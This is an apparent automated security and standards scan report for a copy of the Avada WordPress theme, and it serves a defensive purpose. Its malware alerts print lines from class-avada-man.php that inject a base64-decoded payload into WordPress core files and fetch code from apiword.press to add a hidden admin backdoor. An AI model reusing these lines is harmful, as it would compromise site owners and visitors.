0
Validation results

Avada

Avada

WordPress 4.8 theme
0
Critical alerts
  1. WPScan Vulnerability Database : This theme is vulnerable to security breach "Avada Theme <= 5.1.4 - Stored Cross-Site Scripting (XSS) & CSRF "
    More on Wordpress Vulnerability Scanner site : https://wpvulndb.com/vulnerabilities/8801
  2. Customizer : Sanitization of Customizer settings Found a Customizer setting that did not have a sanitization callback function in file extension_customizer.php. Every call to the add_setting() method needs to have a sanitization callback function passed.
  3. Title : Title The <title> tags can only contain a call to wp_title(). Use the wp_title filter to modify the output.The <title> tags can only contain a call to wp_title(). Use the wp_title filter to modify the output.The <title> tags can only contain a call to wp_title(). Use the wp_title filter to modify the output.
  4. Security breaches : Use of PHP sytem calls Found ->exec in file CurlPost.php.
    Line 83: $response = $this->curl->exec($handle);
  5. Security breaches : Modification of PHP server settings Found ini_set in file class-avada-migrate.php.
    Line 119: @ini_set( 'memory_limit', '256M' );
    Found ini_set in file importer.php.
    Line 53: @ini_set( 'max_execution_time', 300 );
    Line 56: @ini_set( 'memory_limit', '512M' );
  6. Security breaches : Use of base64_decode() Found base64_decode in file class-avada-man.php.
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS['WP_CD_CODE']))) )
    Line 89: $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
    Found base64_decode in file class-avada-patcher-client.php.
    Line 151: $args['reference'] = base64_decode( $args['reference'] );
    Found base64_decode in file class-avada-patcher-apply-patch.php.
    Line 75: $setting = (array) json_decode( base64_decode( $setting ) );
  7. Security breaches : Use of base64_encode() Found base64_encode in file class-fusion-widget-tweets.php.
     $to_send     = base64_encode( $credentials );
    Found base64_encode in file class-avada-patcher-admin-screen.php.
     return base64_encode( wp_json_encode( $patches ) );
  8. Presence of iframes : iframes are sometimes used to load unwanted adverts and malicious code on another site Found <iframe height="100%" width="100%" src="https://www.youtube.com/embed/<?php echo $metadata['pyre_youtube_id'][0]; ?> in file custom_functions.php.
    Line 501: <iframe height='100%' width='100%' src='https://www.youtube.com/embed/<?php
  9. Malware : Operations on file system fopen was found in the file class.avadaredux_helpers.php
    Line 657: //$fp = fopen( $file, 'r' );
    fread was found in the file class.avadaredux_helpers.php
    Line 660: //$file_data = fread( $fp, 8192 );
    fclose was found in the file class.avadaredux_helpers.php
    Line 663: //fclose( $fp );
    file_get_contents was found in the file class-avada-man.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Line 144: if ($file = file_get_contents($e[1]))
    Line 156: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class-avada-man.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Line 44: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Line 160: @file_put_contents(__FILE__, $file);
    file_put_contents was found in the file class-avada-man.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Line 44: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Line 160: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class-avada-man.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Line 144: if ($file = file_get_contents($e[1]))
    Line 156: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class-avada-man.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Line 44: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Line 160: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class-avada-man.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Line 144: if ($file = file_get_contents($e[1]))
    Line 156: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class-avada-man.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Line 44: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Line 160: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class-avada-man.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Line 144: if ($file = file_get_contents($e[1]))
    Line 156: if ($file = @file_get_contents(__FILE__))
    file_get_contents was found in the file class-avada-man.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Line 144: if ($file = file_get_contents($e[1]))
    Line 156: if ($file = @file_get_contents(__FILE__))
    file_get_contents was found in the file class-avada-man.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Line 144: if ($file = file_get_contents($e[1]))
    Line 156: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class-avada-man.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Line 44: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Line 160: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class-avada-migrate.php
    Line 553: $debug_content = file_get_contents( $debug_file_path );
    file_put_contents was found in the file class-avada-migrate.php
    Line 556: file_put_contents( $debug_file_path, $debug_content );
    file_get_contents was found in the file Post.php
    Line 68: return file_get_contents(self::SITE_VERIFY_URL, false, $context);
    fwrite was found in the file SocketPost.php
    Line 104: $this->socket->fwrite($request);
    fclose was found in the file SocketPost.php
    Line 111: $this->socket->fclose();
    fwrite was found in the file Socket.php
    Line 59: * fwrite
    Line 61: * @see http://php.net/fwrite
    Line 66: public function fwrite($string, $length = null)
    Line 68: return fwrite($this->handle, $string, (is_null($length) ? strlen($string) : $lengt
    fwrite was found in the file Socket.php
    Line 59: * fwrite
    Line 61: * @see http://php.net/fwrite
    Line 66: public function fwrite($string, $length = null)
    Line 68: return fwrite($this->handle, $string, (is_null($length) ? strlen($string) : $lengt
    fclose was found in the file Socket.php
    Line 95: * fclose
    Line 97: * @see http://php.net/fclose
    Line 100: public function fclose()
    Line 102: return fclose($this->handle);
    fclose was found in the file Socket.php
    Line 95: * fclose
    Line 97: * @see http://php.net/fclose
    Line 100: public function fclose()
    Line 102: return fclose($this->handle);
    file_get_contents was found in the file parsers.php
    Line 69: $success = $dom->loadXML( file_get_contents( $file ) );
    Line 273: if ( ! xml_parse( $xml, file_get_contents( $file ), true ) ) {
    file_get_contents was found in the file parsers.php
    Line 69: $success = $dom->loadXML( file_get_contents( $file ) );
    Line 273: if ( ! xml_parse( $xml, file_get_contents( $file ), true ) ) {
    fopen was found in the file parsers.php
    Line 421: $fp = $this->fopen( $file, 'r' );
    Line 647: function fopen( $filename, $mode = 'r' ) {
    Line 650: return fopen( $filename, $mode );
    fclose was found in the file parsers.php
    Line 470: $this->fclose($fp);
    Line 665: function fclose( $fp ) {
    Line 668: return fclose( $fp );
    fopen was found in the file parsers.php
    Line 421: $fp = $this->fopen( $file, 'r' );
    Line 647: function fopen( $filename, $mode = 'r' ) {
    Line 650: return fopen( $filename, $mode );
    fopen was found in the file parsers.php
    Line 421: $fp = $this->fopen( $file, 'r' );
    Line 647: function fopen( $filename, $mode = 'r' ) {
    Line 650: return fopen( $filename, $mode );
    fclose was found in the file parsers.php
    Line 470: $this->fclose($fp);
    Line 665: function fclose( $fp ) {
    Line 668: return fclose( $fp );
    fclose was found in the file parsers.php
    Line 470: $this->fclose($fp);
    Line 665: function fclose( $fp ) {
    Line 668: return fclose( $fp );
    file_get_contents was found in the file importer.php
    Line 232: $theme_options_json = file_get_contents( $theme_options_file );
    Line 258: $widgets_json = file_get_contents( $widgets_json );
    file_get_contents was found in the file importer.php
    Line 232: $theme_options_json = file_get_contents( $theme_options_file );
    Line 258: $widgets_json = file_get_contents( $widgets_json );
    file_get_contents was found in the file class-avada-importer-data.php
    Line 103: $demos = file_get_contents( Avada::$template_dir_path . '/includes/plugins/importer/
    file_get_contents was found in the file avada-functions.php
    Line 1016: $try_file_get_contents = false;
    Line 1042: $try_file_get_contents = true;
    Line 1048: $try_file_get_contents = true;
    Line 1050: if ( $try_file_get_contents ) {
    Line 1051: $body = @file_get_contents( $url );
    fopen was found in the file avada-functions.php
    Line 1075: $fp = fopen( $file_path, 'w' );
    fwrite was found in the file avada-functions.php
    Line 1073: // If the attempt to write to the file failed, then fallback to fwrite.
    Line 1076: $written = fwrite( $fp, $body );
    fclose was found in the file avada-functions.php
    Line 1077: fclose( $fp );
  10. Malware : Network operations curl_init was found in the file Curl.php
    Line 36: * @see http://php.net/curl_init
    Line 42: return curl_init($url);
    curl_exec was found in the file Curl.php
    Line 57: * @see http://php.net/curl_exec
    Line 63: return curl_exec($ch);
    fsockopen was found in the file SocketPost.php
    Line 33: * Sends a POST request to the reCAPTCHA service, but makes use of fsockopen()
    Line 91: if (false === $this->socket->fsockopen('ssl://' . self::RECAPTCHA_HOST, 443, $errno, $errstr, 30)) {
    fsockopen was found in the file SocketPost.php
    Line 33: * Sends a POST request to the reCAPTCHA service, but makes use of fsockopen()
    Line 91: if (false === $this->socket->fsockopen('ssl://' . self::RECAPTCHA_HOST, 443, $errno, $errstr, 30)) {
    fsockopen was found in the file Socket.php
    Line 38: * fsockopen
    Line 40: * @see http://php.net/fsockopen
    Line 48: public function fsockopen($hostname, $port = -1, &$errno = 0, &$errstr = '', $timeout = nul
    Line 50: $this->handle = fsockopen($hostname, $port, $errno, $errstr, (is_null($timeout) ? ini_get('
    fsockopen was found in the file Socket.php
    Line 38: * fsockopen
    Line 40: * @see http://php.net/fsockopen
    Line 48: public function fsockopen($hostname, $port = -1, &$errno = 0, &$errstr = '', $timeout = nul
    Line 50: $this->handle = fsockopen($hostname, $port, $errno, $errstr, (is_null($timeout) ? ini_get('
  11. Admin menu : Themes should use add_theme_page() for adding admin pages. File class-avada-avadaredux.php :
    Line 154: add_submenu_page( 'themes.php', __( 'Avada Options have moved!', 'Avada' ),
    File framework.php :
    Line 1344: // wrappers and need to be appened to using add_submenu_page.
    Line 1395: $this->page = call_user_func( 'add_submenu_page', $page_parent, $page_title, $menu_title, $page_permission
    Line 1453: call_user_func( 'add_submenu_page', $this->args['page_slug'], $section['title'], $section['t
    File framework.php :
    Line 1344: // wrappers and need to be appened to using add_submenu_page.
    Line 1395: $this->page = call_user_func( 'add_submenu_page', $page_parent, $page_title, $menu_title, $page_permission
    Line 1453: call_user_func( 'add_submenu_page', $this->args['page_slug'], $section['title'], $section['t
    File framework.php :
    Line 1421: $this->page = call_user_func( 'add_menu_page', $this->args['page_title'], $this->args['menu_title'], $this
    File framework.php :
    Line 1344: // wrappers and need to be appened to using add_submenu_page.
    Line 1395: $this->page = call_user_func( 'add_submenu_page', $page_parent, $page_title, $menu_title, $page_permission
    Line 1453: call_user_func( 'add_submenu_page', $this->args['page_slug'], $section['title'], $section['t
    File welcome.php :
    Line 197: $page = 'add_management_page';
    File class-avada-layout-bbpress.php :
    Line 38: add_action( 'bbp_template_before_search', array( $this, 'add_search_page_search_form' ) );
    Line 125: public function add_search_page_search_form() {
    File class-avada-admin.php :
    Line 340: $avada_menu_page_creation_method    = 'add_menu_page';
    File class-avada-admin.php :
    Line 341: $avada_submenu_page_creation_method = 'add_submenu_page';
  12. Included plugins : Zip file found Plugins are not allowed in themes. The zip file found was fusion-builder.zip fusion-core.zip.
Warning
  1. core scripts deregistered : Core scripts deregistrationFound wp_deregister_script in framework.php. Themes must not deregister core scripts.
    Line 562: wp_deregister_script( 'wpb_ace' );
    Found wp_deregister_script in enqueue.php. Themes must not deregister core scripts.
    Line 215: wp_deregister_script( 'jquerySelect2' );
    Found wp_deregister_script in class-avada-scripts.php. Themes must not deregister core scripts.
    Line 58: wp_deregister_script( 'novagallery_modernizr' );
    Line 62: wp_deregister_script( 'ccgallery_modernizr' );
    Line 76: wp_deregister_script( 'bootstrap' );
    Line 80: wp_deregister_script( 'cssua' );
    Line 84: wp_deregister_script( 'jquery.easyPieChart' );
    Line 88: wp_deregister_script( 'Froogaloop' );
    Line 92: wp_deregister_script( 'imagesLoaded' );
    Line 96: wp_deregister_script( 'jquery.infinitescroll' );
    Line 100: wp_deregister_script( 'isotope' );
    Line 104: wp_deregister_script( 'jquery.appear' );
    Line 108: wp_deregister_script( 'jquery.touchSwipe' );
    Line 112: wp_deregister_script( 'jquery.carouFredSel' );
    Line 116: wp_deregister_script( 'jquery.countTo' );
    Line 120: wp_deregister_script( 'jquery.countdown' );
    Line 124: wp_deregister_script( 'jquery.cycle' );
    Line 128: wp_deregister_script( 'jquery.easing' );
    Line 132: wp_deregister_script( 'jquery.elasticslider' );
    Line 136: wp_deregister_script( 'jquery.fitvids' );
    Line 140: wp_deregister_script( 'jquery.flexslider' );
    Line 144: wp_deregister_script( 'jquery.fusion_maps' );
    Line 148: wp_deregister_script( 'jquery.hoverflow' );
    Line 152: wp_deregister_script( 'jquery.hoverIntent' );
    Line 156: wp_deregister_script( 'jquery.placeholder' );
    Line 160: wp_deregister_script( 'jquery.toTop' );
    Line 165: wp_deregister_script( 'jquery.waypoints' );
    Line 169: wp_deregister_script( 'modernizr' );
    Line 173: wp_deregister_script( 'jquery.requestAnimationFrame' );
    Line 177: wp_deregister_script( 'jquery.mousewheel' );
    Line 182: wp_deregister_script( 'ilightbox.packed' );
    Line 187: wp_deregister_script( 'avada-lightbox' );
    Line 191: wp_deregister_script( 'avada-header' );
    Line 195: wp_deregister_script( 'avada-select' );
    Line 199: wp_deregister_script( 'avada-parallax' );
    Line 203: wp_deregister_script( 'avada-video-bg' );
    Line 239: wp_deregister_script( 'avada' );
  2. theme tags : Presence of bad theme tagsFound wrong tag in style.css header.
  3. Text domain : Incorrect use of translation functions.Wrong installation directory for the theme name. The directory name must match the slug of the theme. This theme's correct slug and text-domain is avada.
  4. Text domain : Incorrect use of translation functions.Found a translation function that is missing a text-domain. Function esc_html__, with the arguments 'No units were entered, falling back to using pixels. Saved value "%2$s" and not "%3$s".' in file validation-functions.php.Found a translation function that is missing a text-domain. Function esc_html__, with the arguments 'No units were entered, falling back to using pixels. Saved value "%2$s" and not "%3$s".' in file validation-functions.php.Found a translation function that is missing a text-domain. Function esc_html__, with the arguments 'No units were entered for %1s, falling back to using pixels. Saved value "%4$s" and not "%5$s".' in file validation-functions.php.Found a translation function that is missing a text-domain. Function esc_html__, with the arguments 'No units were entered, falling back to using pixels. Saved value "%2$s" and not "%3$s".' in file validation-functions.php.Found a translation function that is missing a text-domain. Function _e, with the arguments '&mdash; Select &mdash;' in file class-fusion-widget-menu.php.Found a translation function that is missing a text-domain. Function esc_html__, with the arguments 'Migration Information' in file class-avada-migrate.php.Found a translation function that is missing a text-domain. Function esc_html__, with the arguments 'link' in file class-avada-migrate.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Avada' in file avada-tgm.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Avada' in file avada-tgm.php.Found a translation function that is missing a text-domain. Function esc_attr_e, with the arguments in file list-widget.php.Found a translation function that has an incorrect number of arguments. Function _n, with the arguments 'View 1 %1$s', 'View All %2$s %3$s', total_events, 'the-events-calendar' in file single-day.php.More than one text-domain is being used in this theme. This means the theme will not be compatible with WordPress.org language packs. The domains found are Avada, avadaredux-framework, themecheck, tgmpa, fusion-core, fusion-builder, bbpress, woocommerce, avada, wordpress-importer, envato-market, textdomain, sermon-manager, the-events-calendar, tribe-events-calendar-pro, total_events.
  5. Plugin territory : Plugin territory functionalitiesThe theme uses the add_shortcode() function. Custom post-content shortcodes are plugin-territory functionality.
  6. PHP short tags : Presence of PHP short tagsPHP short tags were found in file parsedown.php. "This practice is discouraged because they are only available if enabled with short_open_tag php.ini configuration file directive, or if PHP was configured with the --enable-short-tags option" (php.net), which is not the case on many servers.
    Line 765: if (preg_match('/^\[(.+?)\]:[ ]*<?(\S+?)>?(?:[ ]+['\'(](.+)['\')])?[ ]*$/', $Line['text'], $matches))
  7. Hidden admin bar : Hidden admin Bar in CSSThemes should not hide admin bar. Detected in file style.min.css.
  8. Editor style : Presence of editor styleNo reference to add_editor_style() was found in the theme. It is recommended that the theme implements editor styling, so as to make the editor content match the resulting post output in the theme, for a better user experience.
  9. I18N implementation : Proper use of _e(Possible variable $link_to_all found in translation function in list-widget.php. Translation function calls should not contain PHP variables.
    Line 56: <a href='<?php esc_attr_e( esc_url( $link_to_all ) ) ?>' rel='bookmark'>
  10. I18N implementation : Proper use of esc_attr_e(Possible variable $link_to_all found in translation function in list-widget.php. Translation function calls should not contain PHP variables.
    Line 56: <a href='<?php esc_attr_e( esc_url( $link_to_all ) ) ?>' rel='bookmark'>
  11. Screenshot : Screenshot fileScreenshot size is 880x660px. Screenshot size should be 1200x900, to account for HiDPI displays. Any 4:3 image size is acceptable, but 1200x900 is preferred.Bad screenshot file extension ! File screenshot.png is not an actual JPG file. Detected type was : "image/png".
Tip-off
  1. favicon presence : Favicon managementPossible Favicon found in class-avada-head.php. Favicons are handled by the Site Icon setting in the customizer since version 4.3.
  2. Static links : Presence of hard-coded linksPossible hard-coded links were found in the file class-avada-avadaredux.php.
    Line 817: $correlation_link = '  <span class='avada-hover-description'><a href='https://theme-fusion.com/avada-doc/options/how-options-work/' target='_blan
    Possible hard-coded links were found in the file welcome.php.
    Line 478: <a href='http://docs.avadareduxframework.com/' class='docs button button-primary'>Do
    Line 481: <a href='https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=MMFMHW
    Possible hard-coded links were found in the file header_stickybar.tpl.php.
    Line 24: <a href='https://theme-fusion.com/support' target='_blank'><span class='dashicons da
    Possible hard-coded links were found in the file class-fusion-widget-facebook-page.php.
    Line 159: <h4 style='line-height: 1.6em;'><?php _e( 'IMPORTANT: Please create a Facebook App and use its ID for features like sharing.', 'Avada' ); ?> <a href='https://developers.facebook.com/docs/apps/register' target='_blank' rel='no
    Possible hard-coded links were found in the file class-avada-upgrade.php.
    Line 326: <li><strong>REMOVED:</strong> Fixed Mode for iPad is removed as a theme option. Fixed Mode is moved into a free plugin. <a href='https://theme-fusion.com/avada-doc/fixed-mode-for-ipad-portrait/' target='_
    Line 347: You can view all update information here: <a href='http://theme-fusion.com/avada-doc/install-update/important-update-informati
    Line 353: <a href='http://theme-fusion.com/avada-documentation/changelog.txt' class='view-chan
    Possible hard-coded links were found in the file support.php.
    Line 11: <p class='about-description'><?php printf( __( 'Avada comes with 6 months of free support for every license you purchase. Support can be <a %1$s>extended through subscriptions</a> via ThemeForest. All support for Avada is handled through our support center on our company site. To access it, you must first setup an account by <a %2$s>following these steps</a>. Below are all the resources we offer in our support center as well as the Avada Patcher tool that allows you to easily apply available patches to the version of Avada you are using.', 'Avada' ), 'a href='https://help.market.envato.com/hc/en-us/articles/207886473-Extending-and-Renewing-Item-Support' target='_blank'', 'href='https://theme-fusion.com/avada-doc/getting-started/avada-theme-support/' ta
    Line 12: <p><a href='https://theme-fusion.com/avada-doc/getting-started/avada-theme-support/' cl
    Line 44: <a href='https://www.facebook.com/groups/AvadaUsers/' class='button button-large but
    Possible hard-coded links were found in the file class-avada-patcher-admin-screen.php.
    Line 134: <span class='avada-auto-patcher learn-more'><a href='https://theme-fusion.com/avada-doc/avada-patcher/' target='_blank' rel='noo
    Possible hard-coded links were found in the file footer.php.
    Line 98: 'description' => sprintf( esc_html__( 'The entire height of the footer area (widgets + copyright) %1$s View tutorial here %2$s. Set a static height in px to enable sticky footer effect. Set to 0 to disable.', 'Avada' ), '<a href='https://theme-fusion.com/avada-doc/footer-special-effects/' target='_blank'
    Possible hard-coded links were found in the file contact.php.
    Line 75: 'description'     => sprintf( esc_html__( 'Follow the steps in %s to get the site key.', 'Avada' ), '<a href='http://theme-fusion.com/avada-doc/pages/setting-up-contact-page/' target='_
    Line 83: 'description'     => sprintf( esc_html__( 'Follow the steps in %s to get the secret key.', 'Avada' ), '<a href='http://theme-fusion.com/avada-doc/pages/setting-up-contact-page/' target='_
    Line 75: 'description'     => sprintf( esc_html__( 'Follow the steps in %s to get the site key.', 'Avada' ), '<a href='http://theme-fusion.com/avada-doc/pages/setting-up-contact-page/' target='_
    Line 83: 'description'     => sprintf( esc_html__( 'Follow the steps in %s to get the secret key.', 'Avada' ), '<a href='http://theme-fusion.com/avada-doc/pages/setting-up-contact-page/' target='_
    Possible hard-coded links were found in the file class-avada-admin.php.
    Line 430: <p><strong><?php esc_attr_e( 'Solution 1:', 'Avada' ); ?></strong> <?php esc_attr_e( 'Import the demo using an alternate method.', 'Avada' ); ?><a href='https://theme-fusion.com/avada-doc/demo-content-info/alternate-demo-method/
    Line 439: <p><strong><?php esc_attr_e( 'Solution 1:', 'Avada' ); ?></strong> <?php esc_attr_e( 'Import the demo using an alternate method.', 'Avada' ); ?><a href='https://theme-fusion.com/avada-doc/demo-content-info/alternate-demo-method/
    Line 430: <p><strong><?php esc_attr_e( 'Solution 1:', 'Avada' ); ?></strong> <?php esc_attr_e( 'Import the demo using an alternate method.', 'Avada' ); ?><a href='https://theme-fusion.com/avada-doc/demo-content-info/alternate-demo-method/
    Line 439: <p><strong><?php esc_attr_e( 'Solution 1:', 'Avada' ); ?></strong> <?php esc_attr_e( 'Import the demo using an alternate method.', 'Avada' ); ?><a href='https://theme-fusion.com/avada-doc/demo-content-info/alternate-demo-method/
    Possible hard-coded links were found in the file class-fusion-builder-migrate.php.
    Line 1117: <p><?php printf( __( 'If you don\'t want your pages converted then please delete the new Avada folder and copy the old Avada folder to your server. If you did not backup your previous Avada theme folder, you can %s.', 'Avada' ), '<a href='https://theme-fusion.com/forums/topic/downloading-avada-4-0-3/' target='_bl
    Line 1123: <p><?php printf( __( 'Once reversion is done, you can load a previous version of Avada onto your server. You can download %s here if you do not have a backup of your previous theme.', 'Avada' ), '<a href='https://theme-fusion.com/forums/topic/downloading-avada-4-0-3/'>' . esc_att
    Line 1165: <?php printf( __( 'All needed posts have been reverted to the previous syntax. You can now roll-back to <a href='%s' target='_blank'>Avada 4.0.3</a>.', 'Avada' ), 'https://theme-fusion.com/forums/topic/downloading-avada-4-0-3/' ); ?>
    Line 1117: <p><?php printf( __( 'If you don\'t want your pages converted then please delete the new Avada folder and copy the old Avada folder to your server. If you did not backup your previous Avada theme folder, you can %s.', 'Avada' ), '<a href='https://theme-fusion.com/forums/topic/downloading-avada-4-0-3/' target='_bl
    Line 1123: <p><?php printf( __( 'Once reversion is done, you can load a previous version of Avada onto your server. You can download %s here if you do not have a backup of your previous theme.', 'Avada' ), '<a href='https://theme-fusion.com/forums/topic/downloading-avada-4-0-3/'>' . esc_att
    Line 1165: <?php printf( __( 'All needed posts have been reverted to the previous syntax. You can now roll-back to <a href='%s' target='_blank'>Avada 4.0.3</a>.', 'Avada' ), 'https://theme-fusion.com/forums/topic/downloading-avada-4-0-3/' ); ?>
    Possible hard-coded links were found in the file multiple-featured-images.php.
    Line 4: Description: Enables multiple featured images for posts and pages. If you like my plugin, feel free to give me reward ;) <a href='http://www.amazon.de/registry/wishlist/16KTW9ZG027C8' title='Amazon Wishlis
    Possible hard-coded links were found in the file avada-functions.php.
    Line 1202: $html .= '<a href='https://theme-fusion.com/avada-doc/sliders/how-to-get-our-demo-sliders/' ti
  3. Optional files : Presence of rtl stylesheet rtl.cssThis theme does not contain optional file rtl.php.
  4. Optional files : Presence of front page template file front-page.phpThis theme does not contain optional file front-page.php.
  5. Optional files : Presence of home template file home.phpThis theme does not contain optional file home.php.
  6. Optional files : Presence of category template file category.phpThis theme does not contain optional file category.php.
  7. Optional files : Presence of tag template file tag.phpThis theme does not contain optional file tag.php.
  8. Optional files : Presence of term template file taxonomy.phpThis theme does not contain optional file taxonomy.php.
  9. Optional files : Presence of date/time template file date.phpThis theme does not contain optional file date.php.
  10. Optional files : Presence of attachment template file attachment.phpThis theme does not contain optional file attachment.php.
  11. Optional files : Presence of image template file image.phpThis theme does not contain optional file image.php.
  12. Use of includes : Use of include or requireThe theme appears to use include or require : class-fusion-image-resizer.php
    Line 142: require_once( ABSPATH . '/wp-admin/includes/file.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : field_repeater.php
    Line 421: require_once( $class_file );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : extension_accordion.php
    Line 79: //include_once($this->extension_dir . 'multi-media/inc/class.customizer.php')
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-avada-avadaredux.php
    Line 85: require_once( dirname( __FILE__ ) . '/avadaredux-framework/avadaredux-frame
    Line 88: require_once( dirname( __FILE__ ) . '/validation-functions.php' );
    Line 90: require_once( dirname( __FILE__ ) . '/class-avada-avadaredux-addons.php' );
    Line 898: require_once( ABSPATH . '/wp-admin/includes/file.php' );
    Line 906: include( dirname( __FILE__ ) . '/assets/style.css' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : framework.php
    Line 410: // 	require_once 'core/dashboard.php';
    Line 414: // 		require_once 'core/newsflash.php';
    Line 1705: require_once 'core/enqueue.php';
    Line 2856: require_once 'core/enqueue.php';
    Line 2914: require_once 'core/panel.php';
    Line 3243: require_once 'core/panel.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : extension_customizer.php
    Line 750: require_once( $class_file );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : welcome.php
    Line 374: require_once 'views/about.php';
    Line 389: require_once 'views/changelog.php';
    Line 404: require_once 'views/extensions.php';
    Line 420: require_once 'views/support.php';
    Line 435: require_once 'views/credits.php';
    Line 450: require_once 'views/status_report.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : field_button_set.php
    Line 46: *              ['format']      string Formatting options for paginate fields. Options include ('currency','nice','niceShort','timeAgoInWords' or a valid Date() f
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
